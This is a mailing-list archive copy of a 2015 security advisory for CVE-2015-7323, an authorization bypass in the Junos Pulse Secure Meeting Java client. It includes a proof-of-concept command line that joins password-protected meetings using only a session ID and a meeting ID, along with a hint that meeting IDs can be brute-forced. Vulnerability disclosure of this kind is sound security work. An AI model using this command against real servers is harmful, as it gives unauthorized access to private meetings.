lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKP=J_8ujYxvH44Z7N3eCLGc1z=dq16=sgqzp5JawwbcctXhdw@mail.gmail.com> Date: Thu, 24 Sep 2015 17:29:36 +0200 From: Profundis Labs <profundislabs@...glemail.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2015-7323 - Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization Profundis Labs Security Advisory https://profundis-labs.com/advisories/CVE-2015-7323.txt Product: ================================ Junos Pulse Secure Meeting Secure Meeting is a part of the Junos Puls Collaboration software, which allows you to organize and holding virtual meetings with internal and external users via the Juniper Access Gateway. Vulnerability Type: =================== Insufficient Authorization Checks CVE Reference: ============== CVE-2015-7323 VENDOR Reference: ================= https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054 Vulnerability Details: ===================== It is possible to enter "secure" meetings without knowledge of the password and the invitation link using the java fat client (meetingAppSun.jar). To access such meetings the following information is required: - A valid sessionID (DSID). This sessionID can be obtained by either having an invitation link to any other meeting or the user has a valid account to log into junos pulse using the http login form. - The meeting ID The meeting ID is a 7-8 digits number which may be gained using brute force or via CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt) Note: The vulnerability is only related to the java fat client. If a user tries to access a secure meeting using the web browser ( https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required. PoC code(s): =============== Example how to start the java fat client to access a meeting A from the command line: java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_ timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C" PARAM_A = meeting ID of Meeting A PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server PARAM_C = a valid sessionID PARAM_D = the domain/IP of the Junos Pulse server Disclosure Timeline: ========================================================= Vendor Notification: 01/2015 Vendor Confirmation: 03/2015 Vendor Patch Release: 06/2015 Public Disclosure: 09/2015 Affected Version: ========================================================= 8.0.5 Exploitation Technique: ======================= Remote Severity Level: ========================================================= CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists